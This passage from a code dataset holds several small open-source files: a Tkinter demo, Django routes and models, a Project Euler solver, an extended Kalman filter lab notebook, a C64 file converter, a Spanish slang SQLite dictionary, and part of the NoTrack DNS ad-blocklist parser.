\"plus\",\n \"shuttle\",\n \"sizing\",\n \"spider\",\n \"spraycan\",\n \"star\",\n \"target\",\n \"tcross\",\n \"trek\"\n]\n \n \n \n# Iterate through all cursors\nfor cursor in cursors:\n Button(root,text=cursor,cursor=cursor).pack()\n \n \n","repo_name":"isahilchanna/Python-Programs","sub_path":"cursors.py","file_name":"cursors.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2836961062","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n # asking for a specific cardid\n\n url(r'^users/([-\\w\\-]+)/$', views.detail, name='detail'),\n url(r'^devices/([-\\w\\-]+)/$', views.devices, name='devices'),\n url(r'^create/$', views.create, name='create'),\n url(r'newUser/$', views.newUser, name='newUser'),\n url(r'^strikeUser/$', views.strikeUser, name='strikeUser'),\n]\n","repo_name":"fau-fablab/uacs-server","sub_path":"myApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11639464200","text":"solmax = 3\nrang = 1000\n\nfor p in range(rang // 4 * 2, rang + 1, 2):\n solutions = 0\n for a in range(2, int(p / 3.4142) + 1):\n if p * (p - 2 * a) % (2 * (p - a)) == 0:\n solutions += 1\n if solutions > solmax:\n solmax = solutions\n maxp = p\n\nprint(maxp)\n","repo_name":"ozturkemre/EulerProject","sub_path":"039-IntegerRightTriangles.py","file_name":"039-IntegerRightTriangles.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75022832426","text":"\n# coding: utf-8\n\n# ## SKOLTECH, Experimental Data Processing\n\n# ## Evgenii Safronov, Mikhail Kurenkov, Taras Melnik\n\n# In[20]:\n\nimport numpy as np\nimport scipy as sp\nfrom matplotlib import pyplot as plt\nfrom numpy.linalg import inv\nimport matplotlib as mplb\nfrom matplotlib.font_manager import FontProperties\nget_ipython().magic('matplotlib inline')\nfrom numpy.random import normal\nfrom mpl_toolkits.mplot3d import Axes3D\nmplb.rc('xtick', labelsize=5) \nmplb.rc('ytick', labelsize=5) \nimport math\n\n\n# In[53]:\n\ndef kalman(X_0, P_0, z, T, h, R, Q, dh, start_step = 0):\n N = len(z)\n X = np.zeros((len(z),*(X_0.shape)))\n P = np.zeros((len(z),*(P_0.shape)))\n Xp= np.zeros_like(X)\n for i in range(N):\n #Prediction\n Xp[i] = X[i] = T.dot(X[i-1] if i > 0 else X_0)\n P[i] = T.dot((P[i-1] if i > 0 else P_0).dot(T.transpose())) + Q\n #Filtration\n if (i >= start_step):\n tmp1 = inv(dh[i](Xp[i]).dot(P[i].dot(dh[i](Xp[i]).transpose())) + R[i])\n tmp2 = dh[i](Xp[i]).transpose().dot(tmp1)\n K = P[i].dot(tmp2)\n X[i] = Xp[i] + K.dot(z[i] - h[i](Xp[i]))\n P[i] = (np.identity(X_0.shape[0]) - K.dot(dh[i](Xp[i]))).dot(P[i])\n return X, Xp\n\ndef generate_acc_trajectory(sigma_a_2, sigma_n_2, N, x_0, v_0, t, a_bias = 0):\n if sigma_a_2 == 0:\n a = np.zeros(N) + a_bias\n else: \n a = np.random.normal(0, sigma_a_2 ** 0.5, N) + a_bias\n v = np.ones(N) * v_0\n x = np.ones(N) * x_0\n for i, a_i in enumerate(a[:-1]):\n v[i+1] = v[i] + a_i*t\n dx = (v * t + a * t * t / 2)\n for i, dx_i in enumerate(dx[:-1]):\n x[i+1] = x[i] + dx_i\n #v2 = np.ones(N) * v_0 + a.dot(np.triu(np.ones((N, N)), 1)) * t\n #x2 = np.ones(N) * x_0 + (v2 * t + a * t * t / 2).dot(np.triu(np.ones((N, N)), 1))\n z = x + np.random.normal(0, sigma_n_2 ** 0.5, N)\n return x, z\n\ndef convert_to_polar(X):\n x = X[:,0,0]\n y = X[:,2,0]\n D = (x**2 + y**2) ** 0.5\n b = np.arctan(x / y)\n return b, D\n\n\n# # Generate a true trajectory\n\n# In[6]:\n\nN = 500\nt = 2\nx_0 = 1000\ny_0 = 1000\nsigma_a_2 = 0.3 ** 2\nv_x = 100\nv_y = 100\n\nx, _ = generate_acc_trajectory(sigma_a_2, 1, N, x_0, v_x, t)\ny, _ = generate_acc_trajectory(sigma_a_2, 1, N, y_0, v_y, t)\n\n\n# # Generate also true values of range $D$ and azimut $\\beta$\n\n# In[7]:\n\nD = (x**2 + y**2) ** 0.5\nb = np.arctan(x / y)\n\n\n# In[8]:\n\nfig = plt.figure(figsize=(10, 
10))\nax = fig.add_subplot(111, polar=True)\nax.set_title('True trajectory', fontsize = 20)\nax.plot(b, D, 'r', linewidth=2)\nax.xaxis.set_tick_params(labelsize=10)\nax.yaxis.set_tick_params(labelsize=10)\n\n\n# # Generate measurements $D^m$ and $\\beta^m$\n\n# In[32]:\n\nsigma_D = 50\nsigma_b = 0.004\nz = [np.zeros(1) for x in range(N)]\nfor i in range(0, N, 2):\n D_n = np.random.normal(0, sigma_D, 1)\n b_n = np.random.normal(0, sigma_b, 1)\n z[i] = np.array([D_n + D[i],b_n + b[i]])\n\n\n# # Generate more accurate measurements of azimuth \n\n# In[33]:\n\nsigma_b_add = 0.001\nfor i in range(1, N, 2):\n b_n = np.random.normal(0, sigma_b_add, 1)\n z[i] = np.array([b_n + b[i]])\n\n\n# # Initial conditions for Kalman filter algorithm\n\n# In[37]:\n\nx_1 = z[0][0, 0] * math.sin(z[0][1, 0])\nx_3 = z[2][0, 0] * math.sin(z[2][1, 0])\ny_1 = z[0][0, 0] * math.cos(z[0][1, 0])\ny_3 = z[2][0, 0] * math.cos(z[2][1, 0])\nX_0 = np.array([[x_3],[(x_3 - x_1) / 2 / t], [y_3],[(y_3 - y_1) / 2 / t]])\nP_0 = np.eye(4) * 10 ** 4\n\n\n# # Develop Kalman filter algorithm to estimate state vector\n\n# In[40]:\n\ndef h_1(X):\n x = X[0]\n y = X[2]\n H = np.zeros((2, 1))\n H[0] = (x ** 2 + y ** 2) ** 0.5\n H[1] = np.arctan(x / y)\n return H\n\ndef dh_1(X):\n x = X[0, 0]\n y = X[2, 0]\n dH = np.zeros((2, 4))\n dH[0, 0] = x / (x ** 2 + y ** 2) ** 0.5\n dH[0, 2] = y / (x ** 2 + y ** 2) ** 0.5\n dH[1, 0] = y / (x ** 2 + y ** 2)\n dH[1, 2] = - x / (x ** 2 + y ** 2)\n return dH\n\ndef h_2(X):\n x = X[0]\n y = X[2]\n H = np.zeros((1, 1))\n H[0] = np.arctan(x / y)\n return H\n\ndef dh_2(X):\n x = X[0, 0]\n y = X[2, 0]\n dH = np.zeros((1, 4))\n dH[0, 0] = y / (x ** 2 + y ** 2)\n dH[0, 2] = - x / (x ** 2 + y ** 2)\n return dH\n\nR_1 = np.array([[sigma_D ** 2, 0], [0, sigma_b ** 2]])\nR_2 = np.array([[sigma_b_add ** 2]])\n\n\n# In[45]:\n\nT = np.zeros((4, 4))\nT[0:2, 0:2] = np.array([[1, t], [0, 1]])\nT[2:4, 2:4] = np.array([[1, t], [0, 1]])\n\nG = np.zeros((4, 2)) \nG[0:2, 0:1] = np.array([[t ** 2 / 2], [t]])\nG[2:4, 1:2] = np.array([[t ** 2 / 2], [t]])\nQ = G.dot(G.transpose() * sigma_a_2)\n\n\ndh = list(range(N))\nh = list(range(N))\nR = list(range(N))\nfor i in range(0, N, 2):\n h[i] = h_1\n dh[i] = dh_1\n R[i] = R_1\n \nfor i in range(1, N, 2):\n h[i] = h_2\n dh[i] = dh_2\n R[i] = R_2\n\n\n# In[54]:\n\nX, Xp = kalman(X_0, P_0, z, T, h, R, Q, dh, 3)\n\n\n# In[74]:\n\nb_f, D_f = convert_to_polar(Xp)\nfig = plt.figure(figsize=(10, 10))\nax = fig.add_subplot(111, polar=True)\nax.set_title('Kalman trajectory', fontsize = 20)\nax.plot(b_f, D_f, 'r', linewidth=2)\nax.xaxis.set_tick_params(labelsize=10)\nax.yaxis.set_tick_params(labelsize=10)\n\n\n# # Run Kalman filter algorithm over $M=500$ runs\n\n# In[67]:\n\nM = 500\nerror_b_f = np.zeros((N, M))\nerror_D_f = np.zeros((N, M))\nerror_b_p = np.zeros((N, M))\nerror_D_p = np.zeros((N, M))\n\nfor i in range(M):\n x, _ = generate_acc_trajectory(sigma_a_2, 1, N, x_0, v_x, t)\n y, _ = generate_acc_trajectory(sigma_a_2, 1, N, y_0, v_y, t)\n \n D = (x**2 + y**2) ** 0.5\n b = np.arctan(x / y)\n z = [np.zeros(1) for x in range(N)]\n for j in range(0, N, 2):\n D_n = np.random.normal(0, sigma_D, 1)\n b_n = np.random.normal(0, sigma_b, 1)\n z[j] = np.array([D_n + D[j],b_n + b[j]])\n for j in range(1, N, 2):\n b_n = np.random.normal(0, sigma_b_add, 1)\n z[j] = np.array([b_n + b[j]])\n \n x_1 = z[0][0, 0] * math.sin(z[0][1, 0])\n x_3 = z[2][0, 0] * math.sin(z[2][1, 0])\n y_1 = z[0][0, 0] * math.cos(z[0][1, 0])\n y_3 = z[2][0, 0] * math.cos(z[2][1, 0])\n X_0 = np.array([[x_3],[(x_3 - x_1) / 2 / 
t], [y_3],[(y_3 - y_1) / 2 / t]])\n    \n    X, Xp = kalman(X_0, P_0, z, T, h, R, Q, dh, 3)\n    \n    b_f, D_f = convert_to_polar(X)\n    b_p, D_p = convert_to_polar(Xp)\n    \n    error_b_f[:,i] = (b - b_f) ** 2\n    error_D_f[:,i] = (D - D_f) ** 2\n    error_b_p[:,i] = (b - b_p) ** 2\n    error_D_p[:,i] = (D - D_p) ** 2\n\n\n# In[73]:\n\nfig, ax = plt.subplots(2,1, figsize=(6,4), dpi = 600, sharex = True)\nax[0].set_title(r'Error $\\beta$', fontsize = 10)\nax[0].plot( (np.sum(error_b_f,axis=1)/(M-1))**0.5, label = 'filtration', linewidth=0.5)\nax[0].plot( (np.sum(error_b_p,axis=1)/(M-1))**0.5, label = 'prediction', linewidth=0.5)\nax[0].set_ylabel('magnitude', fontsize = 7)\nax[0].axhline(sigma_b, label = \"measurement error\", linestyle='--')\nax[0].axhline(sigma_b_add, label = \"acc measurement error\", color = 'r', linestyle='--')\nax[0].set_ylim((0, 0.005))\nax[0].legend(loc='upper right')\n\nax[1].set_title('Error D', fontsize = 10)\nax[1].plot( (np.sum(error_D_f,axis=1)/(M-1))**0.5, label = 'filtration', linewidth=0.5)\nax[1].plot( (np.sum(error_D_p,axis=1)/(M-1))**0.5, label = 'prediction', linewidth=0.5)\nax[1].set_xlabel('points', fontsize = 7)\nax[1].set_ylabel('magnitude', fontsize = 7)\nax[1].axhline(sigma_D, label = \"measurement error\", linestyle='--')\nax[1].set_ylim((0, 100))\nax[1].legend(loc='upper right');\n\n\n# ## One can see from this plot that the measurement error (even the more accurate azimuth measurement error) is several times higher than the true estimation error of both filtration and prediction. There is also an oscillation in Error D and Error b that corresponds to the two measurement types: it can be explained by the different accuracy of the measurements on odd and even steps.\n\n# # Conclusion\n\n# ## Today we have learned the extended Kalman filter with different sources of measurements\n\n# In[ ]:\n\n\n\n","repo_name":"EgorPristanskiy/ExpDataProcessing","sub_path":"Lab13/Lab13.py","file_name":"Lab13.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"20776831896","text":"from . import StudentSubscription\nfrom .user import User\nfrom .. 
import db\n\n\nclass Student(User):\n    __tablename__ = 'students'\n    id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)\n    exams = db.relationship('Exam',\n                            secondary='subscriptions',\n                            foreign_keys=[StudentSubscription.exam_id,\n                                          StudentSubscription.student_id],\n                            backref='student')\n    __mapper_args__ = {\n        'polymorphic_identity': 'student'\n    }\n\n    @classmethod\n    def check_students_ids(cls, students_ids):\n        \"\"\"Return True if any of the provided students ids is invalid\"\"\"\n        return (Student\n                .get_query()\n                .filter(Student.id.in_(students_ids))\n                .count() != len(students_ids))\n","repo_name":"manimanis/capstone","sub_path":"app/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"38272021707","text":"#!/usr/bin/python3\n\nimport sys\nimport array\n\ndef usage():\n    print(\"Usage: %s <64c file>\" % sys.argv[0])\n    exit(1)\n\nif len(sys.argv) != 2:\n    usage()\n\nprgName = sys.argv[1]\nif prgName[-4:] in [\".64c\", \".64C\"]:\n    binName1 = prgName[:-4] + \"-1.bin\"\n    binName2 = prgName[:-4] + \"-2.bin\"\nelse:\n    usage()\n\nprgFile = open(prgName, \"rb\")\n\n#prgFile.seek(0x2)\nscreen = array.array('B')\nscreen.fromfile(prgFile, 1024)\n\nbinFile = open(binName1, \"wb\")\nbinFile.write(screen)\nbinFile.close()\n\nscreen = array.array('B')\nscreen.fromfile(prgFile, 1024)\n\nbinFile = open(binName2, \"wb\")\nbinFile.write(screen)\nbinFile.close()\n\nprgFile.close()\n\n","repo_name":"leuat/TRSE","sub_path":"Publish/tutorials/C64/Olimp/Tools/64c2bin.py","file_name":"64c2bin.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":217,"dataset":"github-code","pt":"37"} {"seq_id":"22520309665","text":"# Dylan Perez\r\nimport sqlite3\r\n\r\ncon = sqlite3.connect(\"slang.db\")\r\ncur = con.cursor()\r\n\r\n# Crea la tabla Slang si no existe\r\ncur.execute('''CREATE TABLE IF NOT EXISTS slang\r\n               (palabra text UNIQUE, definicion text)''')\r\n\r\n# comprueba si la palabra existe\r\n\r\n\r\ndef checkWordExist(palabra):\r\n    c = cur.execute(\"\"\"SELECT EXISTS (SELECT 1 \r\n                   FROM slang \r\n                   WHERE palabra=?\r\n                   LIMIT 1)\"\"\", (palabra, )).fetchone()[0]\r\n    return c\r\n\r\n\r\nwhile True:\r\n    # menu\r\n    print(\"\\n Ingrese el numero que corresponde a la opcion que desea \\n\")\r\n\r\n    menuOpt = int(input(\" 1 Agregar nueva palabra \\n 2 Editar palabra existente \\n 3 Eliminar palabra existente \\n 4 Ver listado de palabras \\n 5 Buscar significado de palabra \\n 6 Salir \\n\"))\r\n\r\n    if(menuOpt == 1):\r\n        # obtenemos la palabra y definicion\r\n        palabra = input(\"\\n Ingrese la palabra a agregar \\n\")\r\n        definicion = input(\r\n            \"\\n por ultimo ingrese la definicion de la palabra \\n\")\r\n\r\n        c = checkWordExist(palabra)\r\n        if c == False:\r\n            # guardamos los datos en una variable params y lo usamos ejecutando el comando sqlite para insertar valores\r\n            params = (palabra, definicion)\r\n            cur.execute(\"INSERT INTO slang VALUES (?, ?)\", params)\r\n\r\n            # guardamos los cambios\r\n            con.commit()\r\n\r\n        else:\r\n            print(\"\\n La palabra ya existe. 
\\n\")\n\n elif(menuOpt == 2):\n palabra = input(\"\\n Ingrese la palabra que desea modificar \\n\")\n\n palabraNueva = input(\"\\n Ingrese el nuevo valor de esta palabra \\n\")\n\n definicion = input(\"\\n Ingrese la nueva definicion de la palabra \\n\")\n\n params = (palabraNueva, definicion, palabra)\n c = checkWordExist(palabra)\n\n if c:\n # si existe remplazamos esa palabra por los nuevos valores\n cur.execute(\"\"\"\n UPDATE slang\n SET palabra = ?,\n definicion= ?\n WHERE palabra = ?;\n \"\"\", params)\n con.commit()\n\n else:\n print(\"No pudimos encontrar la palabra vuelva a intentarlo\")\n\n elif(menuOpt == 3):\n palabra = input(\"\\n Ingrese la palabra que desea eliminar \\n\")\n c = checkWordExist(palabra)\n if c:\n cur.execute(\"\"\"\n DELETE FROM slang\n WHERE palabra = ?\n \"\"\", (palabra, ))\n con.commit()\n\n else:\n print(\"No pudimos encontrar la palabra vuelva a intentarlo\")\n\n elif(menuOpt == 4):\n data = cur.execute(\"\"\"SELECT * FROM slang\"\"\")\n i = 1\n for palabra in data:\n print(f\"{i}. {palabra[0]}\")\n i += 1\n elif(menuOpt == 5):\n\n palabra = input(\n \"\\n Ingrese la palabra que desea ver su significado \\n\")\n c = checkWordExist(palabra)\n if c:\n data = cur.execute(\n \"\"\"SELECT * FROM slang WHERE palabra = ?\"\"\", (palabra, ))\n for palabra in data:\n print(f\"\\nEl significado es: \\n {palabra[1]}\")\n\n else:\n print(\"No pudimos encontrar la palabra vuelva a intentarlo\")\n\n elif(menuOpt == 6):\n break\n\n else:\n print(\"\\n Ingrese una opcion valida \\n\")\ncon.close()\n","repo_name":"Legozuhira/TALLER_SLANGP","sub_path":"slang_pan.py","file_name":"slang_pan.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16648155270","text":"#!/usr/bin/env python3\n#Title : NoTrack\n#Description : This script will download latest block lists from various sources, then parse them into Dnsmasq\n#Author : QuidsUp\n#Date : 2015-01-14\n#Version : 20.12\n#Usage : sudo python notrack.py\n\n#Standard imports\nimport os\nimport shutil\nimport sys\nimport time\n\n#Local imports\nimport errorlogger\nimport folders\nfrom blocklists import *\nfrom config import NoTrackConfig\nfrom host import Host\nfrom ntrkshared import *\nfrom ntrkmariadb import DBWrapper\nfrom ntrkregex import *\nfrom ntrkservices import Services\nfrom statusconsts import *\n\n#Create logger\nlogger = errorlogger.logging.getLogger(__name__)\n\n#######################################\n# Constants\n#######################################\nMAX_AGE = 172800 #2 days in seconds\n\nclass BlockParser:\n def __init__(self, dns_blockip):\n self.bl_custom = ''\n self.__dedupcount = 0 #Per list deduplication count\n self.__domaincount = 0 #Per list of added domains\n self.__totaldedupcount = 0\n self.__dnsserver_blacklist = '' #String for DNS Server Blacklist file\n self.__dnsserver_whitelist = '' #String for DNS Server Whitelist file\n\n self.__blocklist = list() #List of tupples for the blocklist\n self.__blockdomainset = set() #Domains in blocklist\n self.__blocktldset = set() #TLDs blocked\n self.__whiteset = set() #Domains in whitelist\n\n self.__services = Services() #Declare service class\n self.__dbwrapper = DBWrapper() #Declare MariaDB Wrapper\n\n #Fill in users blacklist and tld list locations\n blocklistconf['bl_blacklist'][1] = folders.blacklist\n blocklistconf['bl_tld'][1] = folders.tldist\n\n #Fill in __dnsserver_blacklist and __dnsserver_whitelist based on host IP\n 
self.__get_hostdetails(dns_blockip)\n\n\n def __add_blacklist(self, domain):\n \"\"\"\n Formatted string for a blacklist line\n \"\"\"\n return self.__dnsserver_blacklist % domain\n\n\n def __add_whitelist(self, domain):\n \"\"\"\n Formatted string for a whitelist line\n \"\"\"\n return self.__dnsserver_whitelist % domain\n\n\n def __get_hostdetails(self, dns_blockip):\n \"\"\"\n Get Host Name and IP address for __dnsserver_blacklist and __dnsserver_whitelist\n \"\"\"\n host = Host(dns_blockip) #Declare host class\n logger.info(f'Hostname: {host.name}, IP Address: {host.ip}')\n\n #Setup the template strings for writing out to black/white list files\n [self.__dnsserver_blacklist, self.__dnsserver_whitelist] = self.__services.get_dnstemplatestr(host.name, host.ip)\n\n\n def __extract_list(self, sourcezip, destination):\n \"\"\"\n Unzip a file to destination\n\n Parameters:\n sourcezip (str): Zip file\n destination (str): Output destination\n \"\"\"\n from zipfile import ZipFile\n\n with ZipFile(sourcezip) as zipobj:\n for compressedfile in zipobj.namelist():\n if compressedfile.endswith('.txt'):\n zipobj.extract(compressedfile, f'{folders.tempdir}/')\n logger.debug(f'Extracting {compressedfile}')\n move_file(f'{folders.tempdir}/{compressedfile}', destination)\n\n\n def __add_domain(self, subdomain, comment, source):\n \"\"\"\n Process supplied domain and add it to self.__blocklist\n 1. Extract domain.co.uk from say subdomain.domain.co.uk\n 2. Check if domain.co.uk is in self.__blockdomainset\n 3. If subdomain is actually a domain then record domain in self.__blockdomainset\n 4. Reverse subdomain\n 5. Append to self.__blocklist as [reverse, subdomain, comment, source]\n\n Parameters:\n subdomain (str): Subdomain or domain\n comment (str): A comment\n source (str): Block list name\n \"\"\"\n reverse = '' #Reversed domain\n\n matches = Regex_Domain.search(subdomain)\n\n if matches == None: #Could be a TLD instead?\n self.__add_tld(subdomain, comment, source)\n return\n\n if matches.group(0) in self.__blockdomainset: #Blocked by domain or whitelisted?\n #logger.debug(f'{subdomain} is already in blockdomainset as {matches.group(0)}')\n self.__dedupcount += 1\n self.__totaldedupcount += 1\n return\n\n if matches.group(2) in self.__blocktldset: #Blocked by TLD?\n #logger.debug(f'{subdomain} is blocked by TLD {matches.group(2)}')\n return\n\n if matches.group(0) == subdomain: #Add domain.co.uk to blockdomainset\n #logger.debug(f'Adding domain {subdomain}')\n self.__blockdomainset.add(subdomain)\n\n #Reverse the domain for later sorting and deduplication\n #An Extra dot is required to match other subdomains and avoid similar spellings\n reverse = subdomain[::-1] + '.'\n self.__blocklist.append(tuple([reverse, subdomain, comment, source]))\n self.__domaincount += 1\n\n\n def __add_tld(self, tld, comment, source):\n \"\"\"\n Process TLD and add it to __blocktldset\n\n Parameters:\n tld (str): A possible Top Level Domain\n comment (str): A comment\n source (str): Block list name\n \"\"\"\n matches = Regex_TLD.search(tld)\n\n if matches == None: #Don't know what it is\n return\n\n self.__blocktldset.add(tld)\n reverse = tld[::-1] + '.'\n self.__blocklist.append(tuple([reverse, tld, comment, source]))\n self.__domaincount += 1\n\n def __match_defanged(self, line, listname):\n \"\"\"\n Checks custom blocklist file line against Defanged List line regex\n\n Parameters:\n line (str): Line from file\n listname (str): Blocklist name\n Returns:\n True on successful match\n False when no match is found\n \"\"\"\n 
matches = Regex_Defanged.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n #Add group 1 - Domain and replace defanged [.] with .\n self.__add_domain(matches.group(1).replace('[.]', '.'), '', listname)\n return True\n\n return False #Nothing found, return False\n\n\n def __match_easyline(self, line, listname):\n \"\"\"\n Checks custom blocklist file line against Easy List line regex\n\n Parameters:\n line (str): Line from file\n listname (str): Blocklist name\n Returns:\n True on successful match\n False when no match is found\n \"\"\"\n matches = Regex_EasyLine.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), '', listname) #Add group 1 - Domain\n return True\n\n return False #Nothing found, return False\n\n\n def __match_plainline(self, line, listname):\n \"\"\"\n Checks custom blocklist file line against Plain List line regex\n\n Parameters:\n line (str): Line from file\n listname (str): Blocklist name\n Returns:\n True on successful match\n False when no match is found\n \"\"\"\n matches = Regex_PlainLine.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), matches.group(2), listname)\n return True\n\n return False #Nothing found, return False\n\n\n def __match_unixline(self, line, listname):\n \"\"\"\n Checks custom blocklist file line against Unix List line regex\n\n Parameters:\n line (str): Line from file\n listname (str): Blocklist name\n Returns:\n True on successful match\n False when no match is found\n \"\"\"\n matches = Regex_UnixLine.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), matches.group(2), listname)\n return True\n\n return False #Nothing found, return False\n\n\n def __process_customlist(self, lines, linecount, listname):\n \"\"\"\n We don't know what type of list this is, so try regex match against different types\n 1. Reset dedup and domain counters\n 2. Read list of lines\n 3. Try different regex matches\n\n Parameters:\n lines (list): List of lines\n listname (str): Blocklist name\n \"\"\"\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in lines: #Read through list\n if self.__match_plainline(line, 'custom'): #Try against Plain line\n continue\n if self.__match_easyline(line, 'custom'): #Try against Easy List\n continue\n if self.__match_unixline(line, 'custom'): #Try against Unix List\n continue\n self.__match_defanged(line, 'custom') #Finally try against Defanged\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_csv(self, filelines, linecount, listname):\n \"\"\"\n List of domains in a CSV file, assuming cell 1 = domain, cell 2 = comment\n 1. Reset dedup and domain counters\n 2. Read list of filelines\n 3. Check regex match against Regex_CSV\n 4. 
Add domain and comment\n\n Parameters:\n filelines (list): List of lines from file to being processed\n listname (str): Blocklist name\n \"\"\"\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in filelines: #Read through list\n matches = Regex_CSV.match(line)\n\n if matches is not None: #Has a match been found?\n #Add Group 1 - Domain, Group 2 - Comment\n self.__add_domain(matches.group(1), matches.group(2), listname)\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_easylist(self, lines, linecount, listname):\n \"\"\"\n List of domains in Adblock+ filter format [https://adblockplus.org/filter-cheatsheet]\n 1. Reset dedup and domain counters\n 2. Read list of lines\n 3. Check regex match against Regex_EasyLine\n 4. Add domain\n\n Parameters:\n lines (list): List of lines\n listname (str): Blocklist name\n \"\"\"\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in lines: #Read through list\n matches = Regex_EasyLine.search(line) #Search for first match\n\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), '', listname) #Add group 1 - Domain\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_plainlist(self, lines, linecount, listname):\n \"\"\"\n List of domains with optional # separated comments\n 1. Reset dedup and domain counters\n 2. Read list of lines\n 3. Split each line by hash delimiter\n 4. Add domain\n\n Parameters:\n lines (list): List of lines\n listname (str): Blocklist name\n \"\"\"\n splitline = list()\n\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in lines: #Read through list\n splitline = line.split('#', 1) #Split by hash delimiter\n\n if splitline[0] == '\\n' or splitline[0] == '': #Ignore Comment line or Blank\n continue\n\n if len(splitline) > 1: #Line has a comment\n self.__add_domain(splitline[0][:-1], splitline[1][:-1], listname)\n\n else: #No comment, leave it blank\n self.__add_domain(splitline[0][:-1], '', listname)\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_unixlist(self, lines, linecount, listname):\n \"\"\"\n List of domains starting with either 0.0.0.0 or 127.0.0.1 domain.com\n 1. Reset dedup and domain counters\n 2. Read list of lines\n 3. Check regex match against Regex_UnixLine\n 4. 
Add domain\n Parameters:\n lines (list): List of lines\n listname (str): Blocklist name\n \"\"\"\n\n self.__dedupcount = 0 #Reset per list dedup count\n self.__domaincount = 0 #Reset per list domain count\n\n for line in lines: #Read through list\n matches = Regex_UnixLine.search(line) #Search for first match\n if matches is not None: #Has a match been found?\n self.__add_domain(matches.group(1), '', listname) #Add group 1 - Domain\n\n logger.info(f'Added {self.__domaincount}, Deduplicated {self.__dedupcount}')\n self.__dbwrapper.blockliststats_insert(listname, linecount, self.__domaincount)\n\n\n def __process_whitelist(self):\n \"\"\"\n Load items from whitelist file into self.__blockdomainset array\n (A domain being in the self.__blocklist will prevent it from being added later)\n \"\"\"\n whitedict_len = 0\n sqldata = list()\n splitline = list()\n\n print('Processing whitelist')\n\n filelines = load_file(folders.whitelist) #Load White list\n\n if filelines == None:\n logger.info('Nothing in whitelist')\n delete(f'{folders.dnslists}whitelist.list')\n return\n\n for line in filelines: #Process each line\n splitline = line.split('#', 1)\n if splitline[0] == '\\n' or splitline[0] == '': #Ignore Comment line or Blank\n continue\n\n self.__blockdomainset.add(splitline[0][:-1])\n self.__whiteset.add(splitline[0][:-1])\n\n if len(splitline) > 1: #Line has a comment\n sqldata.append(tuple(['whitelist', splitline[0][:-1], True, splitline[1][:-1]]))\n else: #No comment, leave it blank\n sqldata.append(tuple(['whitelist', splitline[0][:-1], True, '']))\n\n #Count number of domains white listed\n whitedict_len = len(self.__whiteset)\n\n if whitedict_len > 0:\n logger.info(f'Number of domains in whitelist: {whitedict_len}')\n self.__dbwrapper.blocklist_insertdata(sqldata)\n else:\n logger.info('Nothing in whitelist')\n delete(f'{folders.dnslists}whitelist.list')\n\n\n def __tld_whitelist(self):\n \"\"\"\n Any domains in whitelist impacted by the TLD blocks?\n This should be done after TLD and users block lists are processed\n \"\"\"\n\n filelines = list()\n\n #Check for white listed domains that are blocked by tld\n for line in self.__whiteset:\n matches = Regex_Domain.search(line) #Only need the tld\n if matches.group(2) in self.__blocktldset: #Is tld in self.__blocktldset?\n filelines.append(self.__add_whitelist(line))\n\n if len(filelines) > 0: #Any domains in whitelist?\n logger.debug(f'{len(filelines)} domains added to whitelist in order avoid block from TLD')\n save_file(filelines, f'{folders.dnslists}whitelist.list')\n\n else:\n logger.debug('No domains require whitelisting')\n delete(f'{folders.dnslists}whitelist.list')\n\n self.__whiteset.clear() #whiteset is no longer required\n\n\n def __check_file_age(self, filename):\n \"\"\"\n Does file exist?\n Check last modified time is within MAX_AGE (2 days)\n\n Parameters:\n filename (str): File\n Returns:\n True update list\n False list within MAX_AGE\n \"\"\"\n if not os.path.isfile(filename):\n logger.warning(f'{filename} is missing')\n return True\n\n if time.time() > (os.path.getmtime(filename) + MAX_AGE):\n logger.info(f'{filename} older than 2 days')\n return True\n\n logger.info(f'{filename} in date, skip downloading new copy')\n return False\n\n\n def __download_list(self, url, listname, destination):\n \"\"\"\n Download file\n Request file is unzipped (if necessary)\n\n Parameters:\n url (str): URL\n listname (str): List name\n destination (str): File destination\n Returns:\n True success\n False failed download\n \"\"\"\n extension = 
